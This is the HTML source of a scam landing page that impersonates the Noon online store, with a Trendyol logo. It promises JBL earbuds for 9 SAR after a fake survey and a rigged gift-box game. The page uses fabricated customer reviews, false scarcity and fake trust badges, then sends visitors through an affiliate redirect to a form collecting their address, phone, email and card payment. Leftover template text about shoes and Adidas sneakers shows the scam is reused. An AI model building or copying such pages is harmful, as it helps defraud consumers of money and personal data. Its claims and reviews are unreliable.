<!DOCTYPE html><html lang="en"><head>
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="favicon.ico" type="image/png">
    <link rel="stylesheet" href="css/box.css">
    <link rel="stylesheet" href="css/metro-all.min.css">
    <link rel="stylesheet" href="css/adapt.css">
    <link rel="stylesheet" href="css/slick.css">
    <link rel="stylesheet" href="css/client.css">
    <link rel="stylesheet" href="css/mobile-order.css">
    <link rel="stylesheet" href="css/ajax-mobile-master.css">
    <link rel="stylesheet" href="css/main-product-content.css">
    <link rel="stylesheet" href="css/comments.css">
    <link rel="stylesheet" href="css/iconmoon.css">
    <link rel="stylesheet" href="css/product-styles.css">
    <link rel="stylesheet" href="css/jquery.fancybox.css">
    <link rel="stylesheet" href="css/style.css">

    <title>Noon - JBL Earbuds</title>

    <style>
        body,
        html {
            overflow-x: hidden;
        }
    </style>
	
	<!-- Meta Pixel Code -->
    <script>

     !function(f,b,e,v,n,t,s)
     {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
     n.callMethod.apply(n,arguments):n.queue.push(arguments)};
     if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
     n.queue=[];t=b.createElement(e);t.async=!0;
     t.src=v;s=b.getElementsByTagName(e)[0];
     s.parentNode.insertBefore(t,s)}(window, document,'script',
     https://connect.facebook.net/en_US/fbevents.js');
     fbq('init', '1464476670834630');
     fbq('track', 'PageView');
     </script>
     <noscript><img height="1" width="1" style="display:none"
     src="https://www.facebook.com/tr?id=1464476670834630&ev=PageView&noscript=1"

     /></noscript>
     <!-- End Meta Pixel Code -->
</head>

<body>
<!-- class="page_one" -->
<header class="header">
      <span id="logo" href="/" class="logo" title="trendyol">
        <img style="height: 40px; margin-bottom: -3px" src="images/logo.svg" alt="Trendyol">
      </span>
    <div id="autoCompleteAppWrapper">
        <div data-fragment-name="AutoComplete" id="sfx-discovery-search-suggestions">
            <div class="mOkuL__p">
                <div class="N4M8bfaJ">
                    <input data-testid="suggestion" type="text" class="V8wbcUhU" tabindex="1" autocomplete="off" maxlength="50" placeholder="Search..." value=""><i data-testid="search-icon" class="cyrzo7gC"></i>
                </div>
            </div>
        </div>
    </div>
    <div id="accountNavigation">
        <div data-fragment-name="AccountNavigation" data-fragment-id="eb7428a4-6767-4b28-af4e-2e229860da38" data-gateway-service="prod-web-navigation-gateway">
            <div id="account-navigation-container">
                <div class="account-navigation-wrapper">
                    <div class="account-nav-item user-login-container">
                        <div class="link account-user">
                            <div class="icon-container">
                                <i class="i-user initial-icon"></i><i class="i-user-orange hover-icon"></i>
                            </div>
                            <p class="link-text">Login</p>
                        </div>
                    </div>
                    <span class="account-nav-item account-favorites" href="">
                <div class="link">
                  <div class="icon-container">
                    <i class="i-heart initial-icon"></i><i class="i-heart-orange hover-icon"></i>
                  </div>
                  <p class="link-text">Favorite</p>
                </div>
              </span>
                    <div class="account-nav-item basket-preview">
                <span class="link account-basket" href="/sepet">
                  <div class="icon-container">
                    <i class="i-bagg initial-icon"></i><i class="i-bagg-orange hover-icon"></i>
                  </div>
                  <p class="link-text">Cart</p>
                </span>
                    </div>
                </div>
            </div>
        </div>
    </div>
</header>
<style>
    #autoCompleteAppWrapper {
        margin: 0 auto;
    }

    #accountNavigation {
        margin-left: auto;
    }

    .header {
        display: flex;
        width: 100%;
        height: 64px;
        align-items: center;
        justify-content: space-between;
        background-color: #ffee01;
        margin: 0;
        margin-bottom: 15px;
        padding: 0 15px;
    }

    .header .header {
        margin: 0;
        padding: 0;
    }

    .logo {
        display: block;
        width: 150px;
        margin-left: 0;
    }

    .mOkuL__p {
        width: 598px;
        position: relative;
    }

    .mOkuL__p .N4M8bfaJ {
        display: -webkit-box;
        display: -ms-flexbox;
        display: flex;
    }

    .mOkuL__p .N4M8bfaJ .V8wbcUhU {
        -webkit-box-flex: 1;
        -ms-flex: 1;
        flex: 1;
        font-size: 14px;
        color: #000;
        background-color: rgba(0, 0, 0, 0.04);
        border: 2px solid rgba(0, 0, 0, 0);
        border-radius: 6px;
        padding: 10px 40px 10px 15px;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        outline: none;
        -webkit-transition: all ease 0.3s;
        transition: all ease 0.3s;
        line-height: 0;
    }

    .mOkuL__p .N4M8bfaJ .cyrzo7gC {
        width: 18px;
        height: 18px;
        position: absolute;
        right: 15px;
        bottom: calc(50% - 9px);
        cursor: pointer;
        background-image: url("data:image/svg+xml;charset=utf8, %3Csvg xmlns=%27http://www.w3.org/2000/svg%27 width=%2718%27 height=%2718%27 viewBox=%270 0 18 18%27%3E%3Cpath fill=%27%23F27A1A%27 d=%27M18.711 17.306l-4.684-4.703a7.49 7.49 0 0 0 1.864-4.932C15.891 3.441 12.327 0 7.946 0S0 3.441 0 7.671s3.565 7.671 7.946 7.671a8.056 8.056 0 0 0 4.552-1.388l4.72 4.74c.197.197.462.306.746.306.27 0 .525-.1.718-.28a.977.977 0 0 0 .03-1.414zM7.946 2.001c3.238 0 5.873 2.544 5.873 5.67 0 3.127-2.635 5.67-5.873 5.67-3.239 0-5.873-2.543-5.873-5.67 0-3.126 2.634-5.67 5.873-5.67z%27/%3E%3C/svg%3E");
    }

    #account-navigation-container .account-navigation-wrapper {
        display: flex;
        justify-content: space-between;
        flex-direction: row;
        width: 250px;
    }

    #account-navigation-container .account-navigation-wrapper .link {
        margin: 0 !important;
        text-decoration: none !important;
    }

    .account-navigation-container .account-navigation-wrapper .account-nav-item {
        display: flex;
    }

    #account-navigation-container .account-navigation-wrapper .link {
        text-decoration: none;
        display: flex;
        align-items: center;
        position: relative;
        height: 40px;
        font-family: Arial, Verdana, "Roboto";
    }

    #account-navigation-container .account-navigation-wrapper .link .icon-container {
        position: relative;
        height: 18px;
    }

    #account-navigation-container .account-navigation-wrapper .initial-icon,
    #account-navigation-container .account-navigation-wrapper .hover-icon {
        display: block;
        font-size: 16px;
        transition: opacity 0.4s ease;
    }

    #account-navigation-container .account-navigation-wrapper .hover-icon {
        opacity: 0;
        position: absolute;
        left: 0;
        top: 0;
    }

    #account-navigation-container .account-navigation-wrapper .link .link-text {
        font-size: 14px;
        color: #000 !important;
        padding-left: 5px;
        margin-top: 2px;
        font-weight: 700;
        text-decoration: none !important;
        margin-bottom: 0;
        font-family: Arial, Verdana, "Roboto";
    }

    .i-user-orange:before {
        content: "\e965";
        color: #000;
    }

    .i-heart-orange:before {
        content: "\e966";
        color: #000;
    }

    .i-bagg-orange:before {
        content: "\e958";
        color: #000;
    }

    @media (max-width: 1170px) {
        .mOkuL__p {
            width: 400px;
        }
    }

    @media (max-width: 992px) {
        .mOkuL__p {
            width: 200px;
        }
    }

    @media (max-width: 768px) {
        #account-navigation-container .account-navigation-wrapper .link .link-text {
            display: none;
        }

        #account-navigation-container .account-navigation-wrapper {
            width: auto;
        }

        #account-navigation-container .account-navigation-wrapper > div,
        #account-navigation-container .account-navigation-wrapper > a,
        #account-navigation-container .account-navigation-wrapper > span {
            margin-left: 15px;
        }
    }

    @media (max-width: 640px) {
        .mOkuL__p {
            display: none;
        }
    }
</style>
<section id="Check">
    <div class="conteiner">
        <div class="check_info">
            <h2>Check your answers.</h2>
            <div class="loading">
                <img src="images/loading.png" alt="loading">
            </div>
            <div class="verification_elements">
                <p class="time_one">You answered the question 3/3!</p>
                <p class="time_two">Your IP address does not indicate previous requests.</p>
                <p class="time_three">The answer has been verified.</p>
            </div>
        </div>
    </div>
</section>

<section id="game">
    <main id="boxes" class="page page__container">
        <div class="boxes" style="opacity: 1; display: grid; transition: all 1s ease 0s">
            <div id="1" class="box tremor">
                <div class="box__inner"></div>
                <div class="box__front"></div>
            </div>
            <div id="2" class="box tremor">
                <div class="box__inner"></div>
                <div class="box__front"></div>
            </div>
            <div id="3" class="box tremor">
                <div class="box__inner"></div>
                <div class="box__front"></div>
            </div>
            <div id="4" class="box tremor">
                <div class="box__inner"></div>
                <div class="box__front"></div>
            </div>
            <div id="5" class="box tremor">
                <div class="box__inner"></div>
                <div class="box__front"></div>
            </div>
            <div id="6" class="box tremor">
                <div class="box__inner"></div>
                <div class="box__front"></div>
            </div>
        </div>
    </main>
</section>

<section>
    <div class="conteiner">
        <div class="wrapp_modal_box">
            <div class="img_box">
                <img src="images/box-modal.png" alt="gift box">
            </div>
            <h2 class="Congratulations_person">
                Thank you for your answers, you will help us become better!
            </h2>
            <ol>
                <li>
                    You are now have access to our promotional offer and the opportunity to get JBL Earbuds For 9 SAR ONLY
                </li>
                <li>Simply choose the right gift package.</li>
                <li>You have 3 attempts, good luck!</li>
            </ol>
            <div class="link">
                <a class="click_me_pidor">OK</a>
            </div>
        </div>
    </div>
</section>

<section id="fonGrey">
    <div class="conteiner remove">
        <div class="two_modal_icon">
            <ol>
                <li class="topOHH">OHHH...</li>
                <li class="topOHHBot">
                    We're sorry, but this box is empty! You still have (2) attempts left.
                </li>
            </ol>
            <div class="dfd">
                <a class="clickKlos click_me_pidor">OK</a>
            </div>
        </div>
    </div>
</section>
<div class="conteiner">
    <div class="img_gift_wind">
        <img class="pop" src="images/giftModal.png" alt="Gift">
    </div>
</div>
<section>
    <div class="conteiner">
        <div class="two_modal_icon_Two">
            <div class="checkmarkTwo">
                <img src="images/giftModal.png" alt="chekmark">
            </div>
            <h2 class="lastCong">Yay, you won! a <b>JBL Earbuds</b>.</h2>
            <ol class="margLastL">
                <li>1. Click on "OK" and then continue to the delivery page</li>
                <li>2. Fill in the form and make the payment to receive the <br><b>JBL Earbuds</b></li>
                <li>3. Your package will be delivered within 5-7 days.</li>
            </ol>
            <div class="nvnvmdlsl">
                <a class="clickKlos" href="https://quickload-fast.com/?a=1001508&c=337055&co=258420&mt=16&s3=1464476670834630">Ok</a>
            </div>
        </div>
    </div>
</section>
<section id="page_two">
    <div class="conteiner">
        <div class="main-product-content">
            <div class="main-product-wrp">
                <div class="main-roduct-slider-for">
                    <div class="main-roduct-slider-for__item">
                        <img src="images/product4.jpeg" alt="" class="main-roduct-slider-for__image">
                    </div>
                    <div class="main-roduct-slider-for__item">
                        <img src="images/product2.jpeg" alt="" class="main-roduct-slider-for__image">
                    </div>
                    <div class="main-roduct-slider-for__item">
                        <img src="images/product3.jpeg" alt="" class="main-roduct-slider-for__image">
                    </div>
                    <div class="main-roduct-slider-for__item">
                        <img src="images/product1.jpeg" alt="" class="main-roduct-slider-for__image">
                    </div>
                </div>
                <div class="main-product-slider-nav">
                    <div class="main-product-slider-nav__item">
                        <img src="images/product4.jpeg" alt="" class="main-product-slider-nav__image">
                    </div>
                    <div class="main-product-slider-nav__item">
                        <img src="images/product2.jpeg" alt="" class="main-product-slider-nav__image">
                    </div>
                    <div class="main-product-slider-nav__item">
                        <img src="images/product3.jpeg" alt="" class="main-product-slider-nav__image">
                    </div>
                    <div class="main-product-slider-nav__item">
                        <img src="images/product1.jpeg" alt="" class="main-product-slider-nav__image">
                    </div>
                </div>
            </div>
            <div class="main-product-info">
                <h1 class="main-product-info__title"><strong>JBL Vibe 200TWS True Wireless Earbuds</strong></h1>
                <div class="prices-block">
                    <span class="prices-block__old">Was: 169 SAR </span>
                    <span class="prices-block__new">Now: 9 SAR </span></br>
                </div>
				
				<!-- start of personalized code -->
				<div class="sc-e3340931-0 jcWdDF"><div class="sc-f56ef155-0 exxooD"><div class="sc-f56ef155-1 fyDCpe">Mega Deal</div></div></div></br>
				<!-- end of personalized code -->
				
                <div class="text-block">
                    <p class="text-block__paragraph">Congratulations!</p>
                    <p class="text-block__paragraph">
                        You have a chance to get an incredible
                        <b>JBL Earbuds</b> For a special price,<b> 9 SAR ONLY </b>!
                    </p>
                    <p class="text-block__paragraph">
                        Only <b>23</b> Left at this price. <strong>Hurry! Limited Time Offer.</strong>
                    </p>
                    <div class="product-descript-block">
                        <div class="product-name-block">
                            <span class="product-name-block__name">Color:</span>
                            <span class="product-name-block__value">Black</span
                        </div>
                        <div class="product-slider-nav">
                            <div class="product-slider-nav__item active" data-product-name="Black" data-slide="1">
                                <img src="images/product4.jpeg" alt="" class="product-slider-nav__image">
                            </div>
                            <div class="product-slider-nav__item" data-product-name="Blue" data-slide="3">
                                <img src="images/product3.jpeg" alt="" class="product-slider-nav__image">
                            </div>
							<div class="product-slider-nav__item" data-product-name="Purple" data-slide="2">
                                <img src="images/product2.jpeg" alt="" class="product-slider-nav__image">
                            </div>
                        </div>
                    </div>
                    <!-- <div class="product-descript-block size">
                        <div class="product-size-block">
                            <span class="product-size-block__name">Size:</span>
                            <span class="product-size-block__value">36</span>
                        </div>
                        <ul class="size-list">
                            <li class="size-list__item active" data-size="36">36</li>
                            <li class="size-list__item" data-size="37">37</li>
                            <li class="size-list__item" data-size="38">38</li>
                            <li class="size-list__item" data-size="39">39</li>
                            <li class="size-list__item" data-size="40">40</li>
                            <li class="size-list__item" data-size="41">41</li>
                            <li class="size-list__item" data-size="42">42</li>
                            <li class="size-list__item" data-size="43">43</li>
                            <li class="size-list__item" data-size="44">44</li>
                            <li class="size-list__item" data-size="45">45</li>
                            <li class="size-list__item" data-size="46">46</li>
                            <li class="size-list__item" data-size="46">47</li>
                        </ul>
                        <div class="product-name-block" style="margin-top: 15px">
                            <a href="images/size.jpg" class="product-name-block__name size" data-fancybox="">Table of sizes</a>
                        </div>
                    </div> -->
					
					<!-- start of personalized code -->
                    <div class="sc-70e4f488-0 kLNlmB"><div class="sc-70e4f488-1 bTCUGf"><div class="sc-70e4f488-2 cgQawr"><div class="sc-70e4f488-3 elpkcx"><img src="https://z.nooncdn.com/nr/product_badges/delivery_by_noon.png" alt="Delivery 
                    by noon" class="sc-92fbb12b-1 eexmhP"></div><span>Delivery  by noon</span></div><div class="sc-70e4f488-4 eGxCKO"></div><div class="sc-70e4f488-2 cgQawr"><div class="sc-70e4f488-3 elpkcx"><img src="https://z.nooncdn.com/nr/product_badges/high_rated_seller.png" alt="High Rated
                    Seller" class="sc-92fbb12b-1 eexmhP"></div><span>High Rated Seller</span></div><div class="sc-70e4f488-4 eGxCKO"></div><div class="sc-70e4f488-2 cgQawr"><div class="sc-70e4f488-3 elpkcx"><img src="https://z.nooncdn.com/nr/product_badges/cash_on_delivery.png" alt="Cash on 
                    Delivery" class="sc-92fbb12b-1 eexmhP"></div><span>Secure Payment</span></div><div class="sc-70e4f488-4 eGxCKO"></div><div class="sc-70e4f488-2 cgQawr"><div class="sc-70e4f488-3 elpkcx"><img src="https://z.nooncdn.com/nr/product_badges/secure_transaction.png" alt="Secure
                    Transaction" class="sc-92fbb12b-1 eexmhP"></div><span>Secure Transaction</span></div></div></div></br>
					<!-- end of personalized code -->
					
                    <p class="text-block__paragraph">
                        <b>Answer a few questions to get access to the promotional offer.</b>
                    </p>
                </div>
                <div class="block_questions">
                    <div class="question first_question">
                        <p>
                            <span>Question 1 of 3:</span> Do you Like Noon Store?
                        </p>
                        <div class="answer">
                            <a onclick="visiblQuestionOne()">Yes</a>
                            <a onclick="visiblQuestionOne()">No</a>
                        </div>
                    </div>
                    <div class="question two_question">
                        <p><span>Question 2 of 3:</span> How often do you buy shoes?</p>
                        <div class="answer">
                            <a onclick="visiblQuestionTwo()">Often</a>
                            <a onclick="visiblQuestionTwo()">Rarely</a>
                            <a onclick="visiblQuestionTwo()">Very rarely</a>
                        </div>
                    </div>
                    <div class="question three_question">
                        <p>
                            <span>Question 3 of 3:</span> Would you recommend Noon Store to your friends
                            and Families?
                        </p>
                        <div class="answer">
                            <a onclick="visiblPageTwo()">Yes</a>
                            <a onclick="visiblPageTwo()">No</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<section class="section comments" id="comments_display_one">
    <div class="conteiner">
        <div class="comments-rating-block">
            <div class="comments-rating-block__image-wrp">
                <img src="images/logo.svg" alt="" class="comments-rating-block__image">
            </div>
            <span class="comments-rating-block__text">Comments on this action</span>
            <div class="comments-rating">
                <ul class="comments-rating-list">
                    <li class="comments-rating-list__item star-fill"></li>
                    <li class="comments-rating-list__item star-fill"></li>
                    <li class="comments-rating-list__item star-fill"></li>
                    <li class="comments-rating-list__item star-fill"></li>
                    <li class="comments-rating-list__item star-fill"></li>
                </ul>
                <span class="comments-rating__value">4.91</span>
            </div>
        </div>
        <ul class="comments__list">
            <li class="comments__item" id="u1">
                <div class="comments__wrapper">
                    <div class="comments__prop">
                        <div class="comments__rating-wrapper">
                            <ul class="comments__rating">
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                            </ul>
                        </div>
                        <p class="comments__username">Anonymous</p>
                        <p class="comments__date-wrapper">
                  <span class="comments__date">2 days ago</span><span class="comments__reviewed"> </span>
                        </p>
                    </div>
                    <p class="comments__text">
                         i like it i already 4days to use it until now still good battery great performance i give a 5stars
                    </p>
                    <div class="comments__review-image-wrp">
                        <img src="images/img-review1.jpeg" alt="" class="comments__review-image">
                    </div>
                </div>
            </li>
            <li class="comments__item" id="u2">
                <div class="comments__wrapper">
                    <div class="comments__prop">
                        <div class="comments__rating-wrapper">
                            <ul class="comments__rating">
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                            </ul>
                        </div>
                        <p class="comments__username">Mohammed J.</p>
                        <p class="comments__date-wrapper">
                  <span class="comments__date">2 days ago</span><span class="comments__reviewed"> </span>
                        </p>
                    </div>
                    <p class="comments__text">
                      Sound, base and battery backup too good
                    </p>
                    <div class="comments__review-image-wrp">
                        <img src="images/img-review2.jpeg" alt="" class="comments__review-image">
                    </div>
                </div>
            </li>
            <li class="comments__item" id="u3">
                <div class="comments__wrapper">
                    <div class="comments__prop">
                        <div class="comments__rating-wrapper">
                            <ul class="comments__rating">
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                            </ul>
                        </div>
                        <p class="comments__username">Abdullah Al.</p>
                        <p class="comments__date-wrapper">
                  <span class="comments__date">3 days ago</span><span class="comments__reviewed"> </span>
                        </p>
                    </div>
                    <p class="comments__text">
                        سماعه جميله جداً لكن اذا طولت ف اذنك تعور الاذن وتكتم لكن من ناحيه عزل ومن ناحيه صوت واستخدام جميله مره وخفيفه وشاحنها يطول ماشاءالله 👌🏻

                    </p>
                    <div class="comments__review-image-wrp">
                        <img src="images/img-review3.jpeg" alt="" class="comments__review-image">
                    </div>
                </div>
            </li>
            <li class="comments__item" id="u4">
                <div class="comments__wrapper">
                    <div class="comments__prop">
                        <div class="comments__rating-wrapper">
                            <ul class="comments__rating">
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                            </ul>
                        </div>
                        <p class="comments__username">Fairouz Al-Mazrouei</p>
                        <p class="comments__date-wrapper">
                  <span class="comments__date">4 days ago</span><span class="comments__reviewed"> </span>
                        </p>
                    </div>
                    <p class="comments__text">
                        Wow its amazing sound and good one i love it 😍😍😍😍😍

                    </p>
					<div class="comments__review-image-wrp">
                        <img src="images/img-review5.jpeg" alt="" class="comments__review-image">
                    </div>
					
                </div>
            </li>
			
			     <li class="comments__item" id="u4">
                <div class="comments__wrapper">
                    <div class="comments__prop">
                        <div class="comments__rating-wrapper">
                            <ul class="comments__rating">
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                                <li class="star-fill"></li>
                            </ul>
                        </div>
                        <p class="comments__username">Karim Lot.</p>
                        <p class="comments__date-wrapper">
                  <span class="comments__date">4 days ago</span><span class="comments__reviewed"> </span>
                        </p>
                    </div>
                    <p class="comments__text">
                       ما شاء الله لا قوة الا بالله تجنن مره والصوت عالي وعازل كمان وكل شي بيرفكت وانصح فيها والسعر معقول مره لأن برا بتحصلونها على 300-400 وهنا بسعر اقل وهي ترا الاصلية اللهُم السعر مُخفض هنا ، شكرًا نون

                    </p>
					<div class="comments__review-image-wrp">
                        <img src="images/img-review6.jpeg" alt="" class="comments__review-image">
                    </div>
					
                </div>
            </li>
        </ul>
    </div>
</section>

<section class="order-data-wrp hidden">
    <div class="conteiner">
        <div class="cart-content">
            <div class="basket-steps">
                <a href="#" class="step done step-1">
                    <div class="circle step-1"><span class="content"></span></div>
                    <div class="title">Lotterie</div>
                </a><a href="#" class="step current step-2">
                    <div class="circle step-2"><span class="content"></span></div>
                    <div class="title">Order details</div>
                </a><a href="#" class="step step-3">
                    <div class="circle step-3"><span class="content"></span></div>
                    <div class="title">Payment</div>
                </a>
            </div>
        </div>
        <div class="basket-tab">
            <div class="order-form-wrp">
                <div class="order-form-left-side">
                    <form class="cart-form" action="">
                        <!--input type="hidden" name="sub_id5"
                               value="">
                        <input type="hidden" name="utm_source"
                               value="p4_AJ1">
                        <input type="hidden" name="utm_content"
                               value="">
                        <input type="hidden" name="aff_click_id"
                               value="6f472e88wftvrd19" -->
                        <div class="order-form-item">
                            <span class="order-form-item__name">Delivery</span>
                            <div class="order-form-item__fields">
                                <div class="form-group">
                                    <label>City</label>
                                    <div class="input mt-1">
                                        <input name="t8" class="" type="text" data-role="input" data-validate="custom=validateNameFamily" data-role-input="true" required="">
                                        <div class="button-group">
                                            <button class="button input-clear-button" tabindex="-1" type="button">
                                                <span class="default-icon-cross"></span>
                                            </button>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label>Address</label>
                                    <div class="input mt-1">
                                        <input name="t1" class="" type="text" data-role="input" data-validate="custom=validateNameFamily" data-role-input="true" required="">
                                        <div class="button-group">
                                            <button class="button input-clear-button" tabindex="-1" type="button">
                                                <span class="default-icon-cross"></span>
                                            </button>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label>ZIP or postcode</label>
                                    <div class="input mt-1">
                                        <input name="t7" class="" type="text" data-role="input" data-validate="minlength=4" data-role-input="true">
                                        <div class="button-group">
                                            <button class="button input-clear-button" tabindex="-1" type="button">
                                                <span class="default-icon-cross"></span>
                                            </button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="order-form-item">
                            <span class="order-form-item__name">Payment options</span>
                            <div class="order-form-item__fields">
                                <label class="basic-checkbox">
                                    <input type="radio" class="basic-checkbox__input" id="agreement__1" checked="">
                                    <span class="basic-checkbox__style"></span>
                                    <p class="basic-checkbox__text">Pay online by card</p>
                                </label>
                                <style>
                                    .basic-checkbox {
                                        width: 100%;
                                        position: relative !important;
                                        left: 0;
                                        top: 0;
                                        float: left;
                                        width: 100%;
                                        white-space: inherit !important;
                                        opacity: 1 !important;
                                    }

                                    .basic-checkbox__input {
                                        position: absolute;
                                        width: 100%;
                                        height: 100%;
                                        opacity: 0;
                                        margin: 0 !important;
                                        cursor: pointer;
                                        z-index: 30;
                                    }

                                    .basic-checkbox__style {
                                        width: 15px;
                                        height: 15px;
                                        border: 1px solid #000;
                                        position: relative;
                                        float: left;
                                        border-radius: 50%;
                                        overflow: hidden;
                                    }

                                    .basic-checkbox__text {
                                        width: calc(100% - 15px);
                                        padding-left: 10px;
                                        font-size: 14px;
                                        line-height: 16px;
                                        margin: 0 !important;
                                        float: left;
                                    }

                                    .basic-checkbox__input:checked + .basic-checkbox__style:before {
                                        content: "";
                                        display: block;
                                        float: left;
                                        width: 10px;
                                        height: 10px;
                                        position: absolute;
                                        left: 50%;
                                        top: 50%;
                                        transform: translate(-50%, -50%);
                                        background-color: #000;
                                        border-radius: 50%;
                                        overflow: hidden;
                                    }
                                </style>
                            </div>
                        </div>
                        <div class="order-form-item">
                            <span class="order-form-item__name">Personal information</span>
                            <div class="order-form-item__fields">
                                <div class="form-group">
                                    <label>First name</label>
                                    <div class="input mt-1">
                                        <input name="t4" class="" type="text" data-role="input" data-validate="minlength=8" data-role-input="true" required="">
                                        <div class="button-group">
                                            <button class="button input-clear-button" tabindex="-1" type="button">
                                                <span class="default-icon-cross"></span>
                                            </button>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label>Surname</label>
                                    <div class="input mt-1">
                                        <input name="t5" class="" type="text" data-role="input" data-validate="minlength=8" data-role-input="true" required="">
                                        <div class="button-group">
                                            <button class="button input-clear-button" tabindex="-1" type="button">
                                                <span class="default-icon-cross"></span>
                                            </button>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label>Phone number</label>
                                    <div class="input country-input mt-1">
                                        <span class="country-input__value">+966</span>
                                        <input id="phoneInput" class="js-phone-input" type="text" data-role="input" data-validate="minlength=9" data-role-input="true" required="" name="t3">
                                        <div class="button-group">
                                            <button class="button input-clear-button" tabindex="-1" type="button">
                                                <span class="default-icon-cross"></span>
                                            </button>
                                        </div>
                                    </div>
                                    <style>
                                        .country-input {
                                            position: relative;
                                        }

                                        .country-input__value {
                                            position: absolute;
                                            left: -5px;
                                            top: 13.5px;
                                            padding-left: 3rem;
                                            font-size: 1rem;
                                        }

                                        .country-input__value:before {
                                            content: "";
                                            display: block;
                                            position: absolute;
                                            left: 0.75rem;
                                            top: 50%;
                                            transform: translateY(-50%);
                                            float: left;
                                            width: 1.8rem;
                                            height: 1rem;
                                            background: url("images/flag.png") no-repeat;
                                            background-size: 100% 100%;
                                        }

                                        .js-phone-input {
                                            padding-left: 5.2rem !important;
                                        }
                                    </style>
                                </div>
                                <div class="form-group">
                                    <label>E-Mail</label>
                                    <div class="input">
                                        <input name="t2" type="text" data-role="input" data-validate="email" data-role-input="true" class="js-email-input">
                                        <div class="button-group">
                                            <button class="button input-clear-button" tabindex="-1" type="button">
                                                <span class="default-icon-cross"></span>
                                            </button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="buttons" style="width: 100%">
                            <button class="order-footer__button-next btn normal js-submit-button" type="submit">
                                Go to checkout
                            </button>
                            <style>
                                .js-submit-button.disable {
                                    opacity: 0.3;
                                    pointer-events: none;
                                }
                            </style>
                        </div>
                    </form>
                </div>
                <div class="order-form-right-side">
                    <div class="order-item">
                        <div class="order-item__image-wrp">
                            <img src="images/giftModal.png" alt="" class="order-item__image">
                        </div>
                        <div class="order-item__descript">
                            <span class="order-item__name">Adidas Showtheway 2 sneakers</span>
                            <div class="order-item__price-row">
                                <span class="order-item__old-price">273 SAR </span>
                                <span class="order-item__new-price">9 SAR </span>
                            </div>
                        </div>
                    </div>
                    <div class="order-details-list-wrp">
                        <span class="order-details-list-wrp__name">Order details</span>
                        <ul class="order-details-list">
                            <li class="order-details-list__item">
                                <span class="order-details-list__name">Price order</span>
                                <span class="order-details-list__value">9 SAR </span>
                            </li>
                            <li class="order-details-list__item">
                                <span class="order-details-list__name">Delivery</span>
                                <span class="order-details-list__value">0 SAR</span>
                            </li>
                            <li class="order-details-list__item all">
                                <span class="order-details-list__name">Together</span>
                                <span class="order-details-list__value">9 SAR </span>
                            </li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>

<div class="loader-wrp">
    <div class="loader-block">
        <img src="images/loader.gif" alt="" class="loader-block__image">
    </div>
</div>

<div class="loaded-images" style="
        width: 0;
        height: 0;
        opacity: 0;
        pointer-events: none;
        z-index: -1;
        float: left;
        overflow: hidden;
      ">
    <img src="images/box-lid-ios.png" alt="">
    <img src="images/box.png" alt="">
    <img src="images/box-inner.png" alt="">
    <img src="images/box-inner-gift.png" alt="">
</div>

<script src="js/jquery-3.2.1.min.js"></script>
<script src="js/slick.js"></script>
<script src="js/game.js"></script>
<script src="js/slider_scripts.js"></script>
<script src="js/jquery.fancybox.js"></script>
<script src="js/main.js"></script>
<script>
    $(".input-clear-button").click(function (e) {
        e.preventDefault();
        $(this).closest(".form-group").find("input").val("");
        $(this).closest(".form-group").find(".input").removeClass("valid");
        $(this).closest(".form-group").find(".input").removeClass("invalid");
    });

    $(".form-group input").keyup(function () {
        let chabgedInput = $(this);
        let chabgedInputValue = chabgedInput.val();
        if (chabgedInputValue.length >= 1) {
            chabgedInput.closest(".input").addClass("valid");
        } else {
            chabgedInput.closest(".input").removeClass("valid");
            chabgedInput.closest(".input").addClass("invalid");
        }
        if (chabgedInputValue.length < 1) {
            chabgedInput.closest(".input").removeClass("valid");
            chabgedInput.closest(".input").removeClass("invalid");
        }
        validate();
    });

    $(".js-phone-input").keypress(function (event) {
        event = event || window.event;
        if (
            event.charCode &&
            event.charCode != 0 &&
            event.charCode != 46 &&
            (event.charCode < 48 || event.charCode > 57)
        )
            return false;
    });

    function validateEmail(email) {
        var re =
            /[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/;
        return re.test(String(email).toLowerCase());
    }

    function validate() {
        var email = $(".js-email-input").val();
        if (validateEmail(email)) {
            $(".js-email-input").closest(".form-group").find(".input").addClass("valid");
        } else {
            $(".js-email-input").closest(".form-group").find(".input").removeClass("valid");
            $(".js-email-input").closest(".form-group").find(".input").addClass("invalid");
        }
        return false;
    }

    $(".js-pickup").click(function (e) {
        e.preventDefault();
        $("#page_box").hide();
        $(".two_modal_icon_Two").hide();
        $(".order-data-wrp").show();
    });

    $("#agreement__1").click(function (e) {
        if ($(this).prop("checked")) {
            $(".js-submit-button").removeClass("disable");
        } else {
            $(".js-submit-button").addClass("disable");
        }
    });

    $(".cart-form").submit(function () {
        var inputField = $("#phoneInput");

        var inputValue = inputField.val().replace(/[^0-9]/g, "");
        inputField.val(inputValue);
    });
</script>
<script>
    $('form').submit(function (e) {
        e.preventDefault();

        var formData = $(this).serialize();

